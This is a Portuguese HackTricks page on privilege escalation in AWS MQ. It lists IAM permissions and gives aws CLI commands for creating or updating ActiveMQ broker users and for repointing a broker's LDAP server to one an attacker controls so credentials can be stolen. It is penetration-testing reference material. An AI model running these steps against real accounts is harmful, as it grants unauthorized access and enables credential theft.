AWS - MQ Privesc

Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

MQ

Para mais informações sobre MQ, verifique:

mq:ListBrokers, mq:CreateUser

Com essas permissões, você pode criar um novo usuário em um broker ActimeMQ (isso não funciona no RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impacto Potencial: Acessar informações sensíveis navegando pelo ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Com essas permissões, você pode criar um novo usuário em um broker do ActiveMQ (isso não funciona no RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impacto Potencial: Acessar informações sensíveis navegando pelo ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Se um broker estiver usando LDAP para autorização com o ActiveMQ. É possível alterar a configuração do servidor LDAP usado para um controlado pelo atacante. Dessa forma, o atacante poderá roubar todas as credenciais enviadas através do LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Se você conseguir encontrar as credenciais originais usadas pelo ActiveMQ, poderá realizar um MitM, roubar as credenciais, usá-las no servidor original e enviar a resposta (talvez apenas reutilizando as credenciais roubadas você poderia fazer isso).

Impacto Potencial: Roubo de credenciais do ActiveMQ

Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Última actualización